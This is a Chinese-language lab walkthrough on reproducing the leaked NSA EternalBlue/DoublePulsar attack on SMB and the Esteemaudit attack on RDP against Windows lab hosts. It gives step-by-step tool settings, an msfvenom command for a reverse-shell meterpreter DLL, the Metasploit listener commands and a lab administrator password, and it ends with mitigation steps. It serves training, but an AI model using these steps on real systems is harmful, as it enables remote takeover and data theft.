【NSA黑客工具包】Windows-0day驗證實驗
Shadow Brokers再次暴露出一份震驚世界的機密文檔,其中包含了多個Windows 遠程漏洞利用工具,可以覆蓋大量的 Windows 伺服器,一夜之間所有Windows伺服器幾乎全線暴露在危險之中,任何人都可以直接下載並遠程攻擊利用,考慮到國內不少高校、政府、國企甚至還有一些互聯網公司還在使用 Windows 伺服器,這次事件影響力堪稱網路大地震。
影響版本
全球70%的 Windows 伺服器,包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
危害
攻擊者通過執行腳本,使目標主機藍屏重啟,獲取Windows目標主機許可權,對目標機器進行任意操作,攻擊成本和利用條件都很低,只需在本地執行腳本,並設置相關參數。一旦攻擊成功,攻擊者能直接控制目標主機,甚至直接下載資料庫,盜取商業機密,很多的政府、事業單位都會受到影響,影響極大,危害不言而喻。
實驗工具
Metasploit:是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程等。
Equation Group Tools:這是一個集成的工具包,裡面包含了IIS6.0、445埠、3389埠、Rootkit等遠程利用工具,本次試驗我們主要用到它的445埠遠程入侵功能,以及3389遠程埠入侵功能。
實驗目的
掌握工具的用法以及臨時防禦措施
實驗步驟
步驟1:利用Eternalblue與Doublepulsar插件,驗證445 SMB漏洞
我們本步驟利用Eternalblue和Doublepulsar這兩個"插件"來獲取Windows 7 64位的系統許可權。其中Eternalblue可以利用SMB漏洞,獲取Windows 7 系統許可權而Doublepulsar可以載入Metasploit生成的惡意DLL。
我們首先進入cmd命令行,在命令行中進入文件夾:
cd C:/EQGRP_Lost_in_Translation-master/Windows
輸入命令:
fb.py //運行python文件
註:在一般情況下需要在工具根目錄下創建listeningposts文件夾,否則運行文件時,會報錯。
接下來依次填入對應信息:
172.16.12.3 //目標IP
172.16.11.2 //本地IP
no //取消重定向
c:logs //指定日誌文件目錄
繼續填入相關新信息:
0 //創建一個新項目
Test_Win7 //項目名稱
Yes //確認路徑
到這裡就完成了最基本的信息配置,正式啟動了腳本,接下來繼續進行配置,這時就要用到第一個插件了,使用命令:
use Eternalbluet //使用Eternalblue
注意這裡要選擇操作系統、系統位數、傳輸方式,我們分別選擇Windows 7、64位、FB傳輸方式,其他配置信息直接按回車鍵,保持默認即可。
當看到Eternalblue Succeeded字樣,代表成功。
接下來需要用到Metasploit,使用Everything搜索並使用XShell連接到Kali Linux:
連接成功後,使用如下命令生成惡意DLL:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=12399 -f dll >win.dll
這時,/home目錄下就會生成win.dll文件,然後使用如下命令進入Metasploit,設置TCP監聽埠,用於接受攻擊成功後返回的Shell:
msfconsole
use exploit/multi/handler //使用監聽模塊
set payload windows/x64/meterpreter/reverse_tcp //設置payload
show options //查看配置信息
set LHOST 172.16.12.2 //設置本地IP
set LPORT 12399 //設置本地埠
run //運行
如圖,Metasploit已經成功運行,等待Shell的返回。
現在將之前生成的win.dll文件通過FTP複製到Windows機器上,首先點擊下圖中使用紅色小框標示的圖標:
本文中,我將dll文件放在C盤根目錄:
接下來使用Doublepulsar來載入生成的dll文件。
註:這裡系統位數、後門操作、後門路徑,我們分別選擇64位、RunDLL、c:/win.dll,其他保持默認即可
配置完之後,提示成功。
我們再來查看Metasploit
可以看到,成功的利用了插件,已經獲取了Shell。
步驟2:利用Esteemaudit插件,驗證3389 RDP漏洞
本步驟利用Esteemaudit插件,來驗證漏洞存在。(本步驟的目標地址為172.16.12.4)
與上一步驟一樣,首先設置基本信息,這裡就不在贅述:
基本信息配置完成之後,下面對ESTEEMAUDIT 插件進行配置:
use ESTEEMAUDIT //使用ESTEEMAUDIT插件
這裡我將CallbackPort設置為8899埠(其他埠也可以)
手動載入rudo_x86.dll和capa_x86.dll ,因為插件默認選項都在D盤,它不能識別安裝目錄,我們需要手動輸入位置,位於windowsstorage,如圖:
手動載入lipa_x86.dll,原因同上:
其他保持默認即可。
可以看到,成功執行。(同學們也可以使用3389埠對Windows Server 2003進行登錄,賬號密碼為 [administrator,ichunqiu123. ],使用命令netstat -ano 查看是否成功連接)
臨時修復方案
1、使用防火牆過濾/關閉 137、139、445埠。
2、對於 3389 遠程登錄,如果不想關閉的話,至少要關閉智能卡登錄功能。
3、升級補丁,更新系統。
實驗場景連接:【NSA黑客工具包】Windows 0day驗證實驗
推薦閱讀:
※遊戲伺服器架構和web伺服器架構的區別?
※瀏覽器是怎樣載入js代碼的?
※51單片機能否移植uip協議搭建一個web伺服器,通過瀏覽器來訪問控制?
※如何在使用 Linux 命令查找當前目錄底下的文件夾的子目錄中的某個文件?